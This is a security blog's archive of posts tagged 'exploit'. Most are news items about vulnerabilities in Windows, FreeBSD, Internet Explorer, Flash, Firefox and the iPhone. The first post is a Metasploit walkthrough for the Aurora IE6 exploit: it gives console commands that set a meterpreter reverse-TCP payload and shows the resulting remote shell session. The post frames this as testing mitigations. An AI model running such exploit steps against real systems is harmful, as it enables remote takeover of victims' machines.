Tag Archives: exploit

Reproducing the “Aurora” IE Exploit

Filed under Articles
Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync the latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the following commands:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Long-time Windows vulnerability might be fixed soon

Filed under Security News
Mark Russinovich, a software engineer hired by Microsoft to improve the stability of its Windows OS, may have found the key to preventing a significant majority of Windows exploits.

Experts say that, for years, one of Windows' primary vulnerabilities has been its tendency to try to "run" data as though it were computer code. This can be exploited fairly simply by inserting malicious code into heap memory and intentionally crashing the process - placing the system into a state where it looks to the malware itself for instructions, leading to identity theft or other harmful results.

Russinovich, according to Beta News, says that one of the first steps to making Windows more secure is to make it more stable. In this way, he says, crash detection programs have more system resources to spend on analyzing the underlying cause of crashes and can more effectively monitor systems for unauthorized processes.

The Inquirer reports that Russinovich has designed a "fault-tolerant heap," which could provide additional help in preventing the type of exploits that have plagued previous versions of Windows.

FreeBSD hit with local root vulnerability, patch rushed into service

Filed under Security News
The makers of the open-source operating system FreeBSD released a hurried patch to correct what has been described as a critical local root security flaw. The flaw could allow malicious code to be executed with full administrative rights on affected systems.

An exploit for the flaw, published on the Full Disclosure computer security mailing list, was created by a Full Disclosure user known by the online handle Kingcope. Kingcope writes that the "bug resides in the Run-Time Link Editor (rtld)" whose security provisions can be circumvented relatively simply.

Colin Percival, FreeBSD's security officer, recently announced the availability of an emergency patch, which fixes the vulnerability. Percival did warn, however, that due to the immediate need for a patch, the project was conducted with an eye to speed rather than accuracy, and emphasizes that downloading and using the patch is at the user's own risk.

The exploit is one of the first in recent memory published for an open-source OS; most recent published exploits have targeted Microsoft or Google products.

New zero-day flaw discovered in older versions of Internet Explorer

Filed under Security News
Security researchers at Symantec report that new malware has targeted a memory corruption vulnerability in Internet Explorer 6 and 7, which carries the potential for system crashes or malicious redirects.

The company revealed the vulnerability in a blog post over the weekend, saying that, while the current iteration of the malware showed "signs of poor reliability," they expect well-written exploit code to hit the internet in "the near future." The JavaScript-based exploit - which the researchers have dubbed Bloodhound.Exploit.129 - requires prospective victims to visit an infected website.

As usual, the best way to avoid being infected by this malware is to ensure that all of the latest security patches and updates have been applied. Symantec recommends disabling JavaScript and only visiting trusted websites until Microsoft can release a bugfix for the vulnerability.

Though long since superseded by Internet Explorer 8, Internet Explorer 6 and 7 are still widely used by some enterprise consumers for reasons of compatibility and familiarity. Experts recommend upgrading to the latest version and keeping all software patched.

Windows 7 zero-day exploit story keeps getting grimmer

Filed under Security News
A new security advisory issued by Microsoft confirms independent findings about a critical security vulnerability in Windows 7, and offers advice to users who might be affected by the exploit.

The flaw is one of several that have been discovered in Microsoft's Server Message Block architecture, and well-designed exploit code could allow hackers to remotely crash affected computers via denial-of-service attacks.

Microsoft advised users of affected machines to block TCP ports 139 and 445 at the firewall, and cut off the SMB system's access to the internet until a patch can be produced and distributed. Windows 7 and Windows Server 2008 R2 are said to be vulnerable to the exploit, which could potentially be spread via malicious web pages and Microsoft Office documents.

However, the company strongly criticized the security researcher who publicized the exploit, calling the public disclosure of an important security flaw "irresponsible" and urging users to report vulnerabilities directly to the company in the future. Laurent Gaffie told ZDNet that he publicized the information due to what he characterized as a lackadaisical Microsoft response to an unrelated security flaw, which is also unpatched.

Windows 7 RC has zero-day security flaw

Filed under Security News
The release candidate version of the Windows 7 operating system has a zero-day security vulnerability that could allow an attacker to hijack PCs, Microsoft acknowledged late Tuesday.

Security researchers had disclosed security flaws in both Windows 7 RC and Windows Server 2008 R2 on Monday, the day before Microsoft issued its monthly batch of security patches. The vulnerability exists in the Server Message Block 2 (SMB), a network file- and print-sharing protocol that ships with Windows.

"An attacker who successfully exploited this vulnerability could take complete control of an affected system," Microsoft said in a security advisory. "Most attempts to exploit this vulnerability will cause an affected system to stop responding and restart."

Windows Vista, Windows Server 2008 and Windows 7 RC are affected by this vulnerability, but the release to manufacturing versions - the final software versions shipped with new PCs - are not affected, Microsoft said.

Microsoft once again said the vulnerability was not disclosed "responsibly," because researchers posted the vulnerability to the web without warning the company ahead of time.

A critical vulnerability in Internet Information Services (IIS), affecting Windows Server 2003 and 2008, was disclosed in a similar fashion last week.

Security flaw in Adobe Flash exploited by Trojan malware

Filed under Security News
Security researchers at Symantec have identified a critical vulnerability in Adobe Flash that allows an attacker to infect PCs with Trojan malware upon opening a malicious Adobe Acrobat PDF file. Adobe acknowledged the flaw and said it is working on releasing a fix by July 30.

The Flash vulnerability affects current versions of Flash Player for Windows, Mac and Linux operating systems and the authplay.dll component that ships with Adobe Reader and Acrobat v9.x for Windows, Macintosh and UNIX, Adobe's security response team said on its blog.

Deleting, renaming or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat v9.x mitigates the threat for those products, but users will experience a crash or error message when opening a PDF that contains SWF content, Adobe said.

Symantec warned Wednesday that the Flash bug is serious because of the widespread use of Flash across operating systems and products.

Whereas most vulnerabilities only affect one web browser or software product, Flash exists in all popular browsers and is also available in PDF documents.

"[T]herefore, the threat posed by this issue is not to be taken lightly," Symantec warned on its blog.

Mozilla: No hacker exploit for Firefox 3.5.1 vulnerability

Filed under Security News
A flaw in the just-released Firefox 3.5.1 web browser has been confirmed by Mozilla, but the company said on its security blog that it has seen no proof of an attack exploit for the vulnerability, which causes the browser to crash.

IBM reported last week that Firefox 3.5.x is vulnerable to a stack-based buffer overflow, by which an attacker could execute arbitrary code on the system or cause the application to crash. IBM rated the security threat from the vulnerability as high, because a remote hacker could gain access.

Mozilla said that, while the vulnerability exists and can result in crashes of some versions of Firefox, "the reports by press and various security agencies have incorrectly indicated that this is an exploitable bug." The company said it has seen no example of exploitability.

The Department of Homeland Security's National Vulnerability Database reports that the flaw allows remote attackers to cause a denial of service (application crash), "or possibly have unspecified other impact," via a long Unicode string.

Mozilla said it has attempted to get IBM and others to correct their reports.

Firefox 3.5.1 was issued last week, ahead of schedule, in order to patch a security flaw in the earlier version of the browser, Firefox 3.5.

iPhone may be vulnerable to SMS security flaw

Filed under Security News
Apple's iPhone 3GS may have an SMS flaw that could allow an attacker to remotely execute malicious code or hijack the device as part of a botnet, security researcher Charlie Miller said last week at a network security conference in Singapore, according to IDG News Service.

Miller, an authority on Mac OS X security and co-author of The Mac Hacker's Handbook, said he was able to use the vulnerability in the way the iPhone receives text messages to remotely crash the phone. Miller said he reported the vulnerability to Apple.

He said hackers could theoretically exploit the vulnerability to monitor the location of the phone using GPS, turn on the phone's microphone to eavesdrop on conversations or hijack the phone as part of a botnet or to launch distributed denial-of-service attacks, IDG News reported.

Miller also warned that "jailbreaking" an iPhone to add software or capabilities not offered by Apple leaves the device vulnerable to hacking and viruses.

"If you care about security, don't use a jailbroken iPhone," Miller said, according to IDG News.